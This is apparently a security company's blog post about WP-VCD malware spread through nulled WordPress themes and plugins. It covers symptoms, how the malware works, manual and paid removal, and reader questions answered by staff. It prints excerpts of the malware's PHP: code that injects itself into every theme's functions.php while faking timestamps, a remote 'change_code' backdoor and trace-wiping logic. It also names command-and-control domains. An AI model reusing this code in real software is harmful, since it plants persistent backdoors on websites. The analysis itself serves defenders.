911 Hack Removal

How You Can Remove WP-VCD Using Astra’s One-Click Malware Scanner

Updated on: May 4, 2020

How You Can Remove WP-VCD Using Astra’s One-Click Malware Scanner

Is your website showing any of the following symptoms all of a sudden:

  • A lot of malicious pop-ups
  • redirecting to unsolicited websites
  • Showing spam URLs
  • Getting slowed down due to high CPU usage (someone might be stealing your resources)
  • Website suspended by the host

Is your WordPress website hacked? It could be a WP VCD hack.

We are experts in this.

Then there is a high chance that you are infected with WP-VCD malware.

The WP VCD malware gets a foothold in your site by leveraging loopholes in outdated plugins and themes. In most WP-VCD cases, the web owners infect themselves by installing a free/nulled plugin & themes from unauthorized sources, while in others it occurs as a result of contamination by infected sites.

It’s been a while since WP-VCD malware made its first appearance but the campaign is still going on with full fervor. In fact, most infections in WordPress sites result from WP-VCD malware.

See the graph below:

As many as 56% WordPress website infections happen from infected plugins. Additionally, infections by themes make up to 6% of the total WordPress infections.

What is WordPress WP-VCD Malware?

WP-VCD malware comes pre-installed with pirated versions of a paid theme/plugin. These nulled (pirated) themes and plugins contain malicious scripts that get deployed when you install them.

After setting its foot on your website through a nulled theme, it goes on to infect every other theme on your site. In the case of a shared server, this malware then propagates to infect each unprotected site hosted on that server.

Invariably, preventing WP-VCD infections are quite difficult as web owners install this malware voluntarily on their websites. The exceptionally good SEO done for these nulled themes & plugins makes the situation worse.

If you’ll search “Free [pugin name] download”, it’s almost certain that the top results would be of the WP-VCD malware distributing sites. This often traps web developers & designers into installing the malware.

An example of the WP-VCD malicious script is below:

$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';

$ping = true;
$ping2 = false;
if ($list = scandir( $themes ))
{
foreach ($list as $_)
{

if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
}
else
{
$ping = false;
}
}

}

else
{
$list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
foreach ($list2 as $_2)
{

if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
$ping2 = true;
}

What are the symptoms of wp-vcd malware?

  1. A New WordPress Administrator added without your knowledge
  2. Your hosting provider suspended your WordPress account because of wp-vcd malware attack to protect other websites
  3. Account suspension by the host due to excessive resource consumption
  4. SEO spam such as Japanese search results or Pharma attack in Google Search Results.
    Below is the screenshot of Google spam search results:
    wp-vcd hacked results in Google

    Related: WordPress spam search results and how to fix them.
  5. Unknown JavaScript code in the source of your website
  6. Pages on your website being redirected to shady websites
  7. Unknown PHP files in the wp-includes folder which are not there in the WordPress GitHub repository
  8. PHP files in the wp-content/uploads directory and it’s sub-directories
  9. Malware scanner flags WP-VCD on your website.

WP-VCD malware
Astra’s malware scanner flagging WP-VCD

30,000 websites get hacked every single day. Are you next?

Secure your website from malware and hackers using Astra before it is too late.

Why were you infected with wp-vcd Malware?

The reason behind the infection could be plenty. Most common of which are:

  1. Use of a nulled theme – the wp-vcd malware in many cases comes pre-installed with every downloaded theme from nulled theme websites
  2. Use of outdated WordPress plugins & themes for your site.
  3. No Web Application Firewall (WAF) installed to block hacking attempts made by hackers

How does WP-VCD malware work?

Getting to the part where you’ve installed & activated the nulled theme.

The next thing WP-VCD does is create backdoors on your website. Usually, this is done by adding hidden WordPress admin users.

These user accounts are regulated remotely by a chain of WP-VCD perpetrators via a vast command and control (C2) infrastructure. Hackers get a tight grip on your website through these backdoors. This is how they reinfect your site after every partial cleanup.

Some variants of the malicious codes have been seen to modify core WordPress files. Sometimes, they also add new files in the /wp-includes directory.

Long story short, this is what happens in a WP-VCD malware hack:

  1. The WP-VCD malware creates Spam URLs on the website (also referred to as URL Injection)
  2. The malware creates a backdoor which allows hackers to have access to your website for extended periods
  3. Hackers are able to exploit vulnerabilities in WordPress plugins & themes. These plugins  & themes when installed upload the WP-VCD malware on vulnerable sites.
  4. WP-VCD expands to unprotected sites on the same server and gets a more strong grip.

Such a hack could have been avoided with a Web Application Firewall (WAF) and regular malware scanning. It is also essential to check modification of WordPress core files, plugins & themes.

Analysis of what WP-VCD malware does?

Deploys Malicious scripts

In the functions.php file within your theme, you would see some code similar to this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

This code checks if there are deployer scripts available and subsequently executes them. As you can see in the code above, the file that’s been called is the class.theme-modules.php file. Now, depending on where the infection emanates from (i.e. theme or plugin), the malicious script will be in file class.theme-modules.php or class.plugin-modules.php respectively.

In the example above, it is the class.theme-modules.php file that actually installs the wp-vcd malware into the other themes installed (enabled/disabled) and creates all the other malicious files.

Creates Backdoor

Code snippet of the malware code:

<?php
 
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2); 
DEFINE('MAX_ITERATION', 50); 
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);

$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...(base64-encoded string of PHP code)
...

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
 @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
 if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
 @file_put_contents('wp-tmp.php', $tmpcontent);
 }
 }

As we had discussed in the earlier section, this code would create a new admin user with a name similar to 100010010. The objective of this backdoor admin account is to make sure that the hacker is able to access the website even if you delete the malicious code – basically, so that the attackers could attack your website at a later point in time.

Besides providing the hacker with another access to the site, backdoors perform several other functions for hackers. Primarily, these backdoor:

  1. Adds more backdoors
  2. Gets more instructions from hackers

Adds more backdoors

WP-VCD conspirators can use backdoors to add any new code in the function.php file. Here is how:

case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;

With the change_code feature in already injected backdoors, the hacker can inject any ‘new code‘ in your site.

Gets instructions from hackers

Sometimes hackers inject URLs of their C2 servers. These URLs are later called to deploy action across the infected sites in one go. Domains such as www.krilns.com/code.php​, ​krilns.pw​, ​krilns.top, etc have been found executing this in many WP-VCD infected sites.

Infects other files and sites

The next thing that the WP-VCD malware does is to expand itself. It deploys the malicious script in every theme and plugin on your site. Next, it goes on to find vulnerable sites on the same server and infects them too.

This propagation starts with the deployment of a script located at wp-includes/wp-vcd.php​. It’s followed by modifications in the core wp-includes/post.php​ which at last execute the code in ​wp-vcd.php​ on every page.

Destroys the trails

As a final step, the WP-VCD malware removes the original signs of infection from the theme/plugin. If you will look closely the following code, you’ll see how preg_replace () is used to remove all contents between install_code and install_code_end.

if ($file = @file_get_contents(__FILE__)) { $file = preg_replace('!//install_code.*//install_code_end!s', '', $file); $file = preg_replace('!<\?php\s*\?>!s', '', $file); @file_put_contents(__FILE__, $file); 
}

30,000 websites get hacked every single day. Are you next?

Secure your website from malware and hackers using Astra before it is too late.

How to remove the wp-vcd malware infection

With Astra, you can remove the infection with a click of a button. Simply run a scan with Astra’s malware scanner and remove the infected files right from the dashboard.

If you have not yet tried Astra’s one-click malware removal, get it from here. To remove WP-VCD manually read on.

First things first, search for occurrences of the below files/strings on your server and examine their contents.

Run a diff check of the file contents with corresponding files in the WordPress core GitHub repository or theme/plugin directory. You can use either of the approaches (or both) using SSH or using your IDE.

Approach 1 – Search for files on the server that are usually infected with the wp-vcd hack

  1. wp-includes/wp-vcd.php
  2. wp-includes/wp-tmp.php
  3. wp-content/themes/*/functions.php (all themes installed on the server whether active or not)
  4. class.wp.php
  5. admin.txt
  6. codexc.txt
  7. code1.php
  8. class.theme-modules.php (inside the theme folder)

Approach 2 – Search for string patterns that are found in infected malware files

  1. tmpcontentx
  2. function wp_temp_setupx
  3. wp-tmp.php
  4. derna.top/code.php
  5. stripos($tmpcontent, $wp_auth_key)

Files such as wp-vcd.php, wp-tmp.php, class.theme-modules.php can be deleted off the server after any reference to them is deleted from all the active or inactive themes’ functions.php file or core WordPress files in the website root.

Check out this step-wise WordPress malware removal blog post for the full process. 

How to protect WordPress and stay secure from the backdoor

  1. Create a simple security strategy:
    1. Clean – Make sure your website files and database is 100% clean and malware-free
    2. Protect – Install a Web Application Firewall (WAF) to block re-infection attempts
    3. Monitor – Run regular malware scans to check if files/database have tampered
  2. Delete unused WordPress themes (even if disabled)
  3. Completely avoid Nulled themes on your website
  4. Update WordPress core, Plugins and themes

Here’s a complete video that you need to follow step by step to secure your WordPress site.

Cleaning infected websites with such malware is not always easy. Because, once they are activated on a website, they tend to infect other areas of the website too by installing the different type of malware codes.

Further, this particular malware also creates a backdoor that allows the bad guys to get complete control of your site. Hence, it is important to create an effective security strategy that does a thorough analysis of your website. And afterward completely removes the hack from your website.

Wordpress Malware removal steps

Astra

At Astra, we have a team of security experts who daily resolve dozens of web security issues. Our web application firewall ASTRA protects your website 24×7 from XSS, SQL injection, bad bots, malware and 80+ other threats.

Don’t take our words for it. See it for yourself!

Peek inside Astra

Was this post helpful?

Tags: , ,

Ananda Krishna

Ananda Krishna is the co-founder & CTO of Astra Security, a SaaS suite that secures businesses from cyber threats. He has been acknowledged by the Indian Navy, Microsoft, United Airlines, etc. for finding critical security vulnerabilities in their systems. Winner of the Best Security Product at Global Conference on Cyberspace 2017 (awarded by Narendra Modi, Prime Minister of India) & French Tech Ticket, Paris (awarded by François Hollande, former President of France).At Astra he's building an intelligent security ecosystem - web application firewall (WAF), malware detection & analysis, large scale SaaS applications, APIs & more. He's actively involved in the cybersecurity community and shared his knowledge at various forums & invited talks.

34
Questions? Got something to add? Let’s Talk

avatar
17 Comment threads
17 Thread replies
0 Followers
 
Most reacted comment
Hottest comment thread
18 Comment authors
Sai KrishnaFelicienne MaroisCovillonFletcher MontyAudric Garceau Recent comment authors

This site uses Akismet to reduce spam. Learn how your comment data is processed.

newest oldest most voted
Fleta
Guest
Fleta

Thank you for this informative read, I have shared iit on Twitter.

Aakanchha Keshri
Admin

We are glad that you found it informative Fleta, and many thanks for sharing this on twitter.

ahiad hazan
Guest
ahiad hazan

thank you very much for the detailed explanation.

I have a question,

I have cleaned the functions.php file from the snippet and deleted the wp-vcd.php file.
search through the SQL for all the string patterns and found nothing.

does it mean I’m safe?

Aakanchha Keshri
Admin

Hi Ahiad, what you’ve done so far should remove the malware. We’ve also seen in some cases that wp-includes/wp-tmp.php get created which could store the backdoors. Removing these files removes the infection, but the vulnerability would also have to be identified and patched. To harden your WordPress’ security further you can use this free plugin here – https://wordpress.org/plugins/wp-security-hardening/

DEEPAK RATHOR
Guest

That’s a really good point this Article is very helpful and informative. Thanks for sharing

Aakanchha Keshri
Admin

Thanks Deepak for your appreciative words 🙂 To get regular updates on WordPress security subscribe to our newsletter.

Oussama
Guest

Thank you for this useful Article, That help me a lot

Aakanchha Keshri
Admin

We are glad that we could be of any help to you Oussama 🙂

Ezekiel
Guest
Ezekiel

Thanks a lot. I am currently experiencing this. At first I thought my host was just making life a living hell for me but now I realize. I will surely follow this guide.

Aakanchha Keshri
Admin

Glad you liked it, go ahead and apply it 🙂

Darron
Guest
Darron

Hi, my WordPress account got Suspended. I think it’s because of Malware. How can I fix this by my host?

Sai Krishna
Editor

Thanks for responding to the article. WordPress users may feel devastated. The hosting providers may give multiple reasons for WordPress accounts being suspended. Although in reality, it is often something that triggered the automatic systems. These systems then respond via account suspensions and system generated mail. The end users may feel cheated upon the suspension of their service. For more information visit here: https://www.getastra.com/blog/911/wordpress-account-suspended-because-of-malware-how-to-fix-account-suspension-by-host/

Florus Hachée
Guest
Florus Hachée

My WordPress website is showing some strange Japanese content on google search. Is my website hacked? If yes, how can i solve it?

Sai Krishna
Editor

Thanks for responding to the article. In a Japanese keyword hack, auto generated Japanese text starts to appear on your site. This particular Blackhat SEO technique hijacks Google search results by displaying Japanese words in the title and description of the infected pages. It happens when different web pages are shown to search engines and normal visitors. For more information on removal visit here: https://www.getastra.com/blog/911/japanese-keyword-hack/

Aubert Sansouci
Guest
Aubert Sansouci

I would like to know more information on pharma attacks that are happening. How can I protect from happening this to our website.

Sai Krishna
Editor

Thanks for responding to the article. WordPress is probably the most popular CMS used to create websites. However, their popularity has made them juicy targets for hackers and SEO spammers. Hackers continuously try to manipulate search indexes to include undeserving content on prominent search positions. For more information on this hack, visit here: https://www.getastra.com/blog/911/pharma-hack-wordpress-and-drupal/

Blais
Guest
Blais

Hello, I have a WordPress site and when I search for my website in google it is showing some Japanese characters. Is there any way I can get rid of this?

Sai Krishna
Editor

Thanks for responding to the article and Sorry to hear about the spam. When using a Content Management System (CMS) like OpenCart, Magento, Drupal or WordPress you’ll find auto-generated Japanese SEO Spam pages. These pages contain affiliate links to stores selling fake brand merchandise. These Japanese products are ‘Spamvertised’ to increase revenue and benefit from the outbound links from your store. For more information on hack removal visit here: https://www.getastra.com/blogv2/911/japanese-keyword-hack/

loridan Blanc
Guest
loridan Blanc

Do you know how I can fix the redirection hack of WordPress? I have a site that is redirecting to strange websites and I want to fix it myself.

Sai Krishna
Editor

Thanks for responding to the article. A WordPress malware redirect hack is a common form of attack where the visitors to the infected website are automatically redirected to phishing sites or malicious websites. For more information visit here: https://www.getastra.com/blog/911/wordpress-redirect-hack/

Eugenia Rivière
Guest
Eugenia Rivière

So, I own a wp site and strangely I don’t know how our admin panel got hacked? I would like to know if there’s any way to solve this.

Sai Krishna
Editor

Thanks for responding to the article. A new type of wp-admin hack has surfaced which adds an unauthorized WordPress admin user and infects the site with a pharma hack. The typical consequences of such a hack include complete website takeover, data theft, compromise of database and SEO hijacking. The WordPress admin is the most crucial part of your website. Getting locked out of the admin would mean losing access to your website. For more info, visit here: https://www.getastra.com/blog/911/fix-wordpress-admin-dashboard-wp-admin-hack/

Fortun Sauvé
Guest
Fortun Sauvé

Good article, so what are the common files that have a high chance of getting hacked. I own a website running on WordPress.

Sai Krishna
Editor

Thanks for responding to the article. You can go through this article to know more info on common files that get hacked and how to protect the: https://www.getastra.com/blog/911/wordpress-files-hacked-wp-config-php-hack/

Fortun Sauvé
Guest
Fortun Sauvé

Recently I noticed that many WordPress sites are getting hacked again and again because of backdoors. What are these and how can I defend from happening this to me?

Sai Krishna
Editor

Thanks for responding to the article. Hackers are always at play trying to inject WordPress backdoor. There have been multiple plugins over the years used to spread infection. Therefore, the threat could be from anywhere. Later on, it can be a time and resource consuming process to remove WordPress backdoors. For more info, visit here: https://www.getastra.com/blog/911/wordpress-backdoor-hack/

Audric Garceau
Guest
Audric Garceau

I would like to opt for a security audit for my WordPress site? Can you provide more details about audit and pricing?

Sai Krishna
Editor

Thanks for responding to the article. Sure, you can visit here to know more on our WordPress security audit: https://www.getastra.com/wordpress-vapt#securityAuditFrequencySelection

Fletcher Monty
Guest
Fletcher Monty

I am an author and I have a blog in which I write articles and It’s wordpress. I have noticed that my blog is getting redirected to strange websites. How can I solve this?

Sai Krishna
Editor

Thanks for responding to the article. WordPress redirect hacks have been a menace for such a long time now. It metamorphs itself into new redirect hacks every few weeks. For more info, visit here: https://www.getastra.com/blog/911/adaranth-wp-blog-redirection-hack/

Covillon
Guest
Covillon

What is a backdoor shell and how can it help hackers to get access to the website?

Sai Krishna
Editor

A web shell or backdoor shell is a script written to enable remote access and administration of the server using GUI. It is a type of malware which is able to pass commands that are directly executed by the operating system. Attackers use these to gain complete access to the server (code execution), it’s file system & databases. Shell scripts are used by attackers to escalate & maintain persistent access on a vulnerable web application.

Felicienne Marois
Guest
Felicienne Marois

Can you tell me the features that the Astra firewall comes with? I am looking for a firewall for my website.

Sai Krishna
Editor

Thanks for responding to the article and also for showing interest in Astra. You don’t have to worry about any malware, credit card hack, SQLi, XSS, SEO Spam, comments spam, brute force & 100+ types of threats. This means you can get rid of other security plugins & let Astra take care of it all.You can know more info about features and other here: https://www.getastra.com/features

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include firewall, malware scanner and security audits to protect your site from the
evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany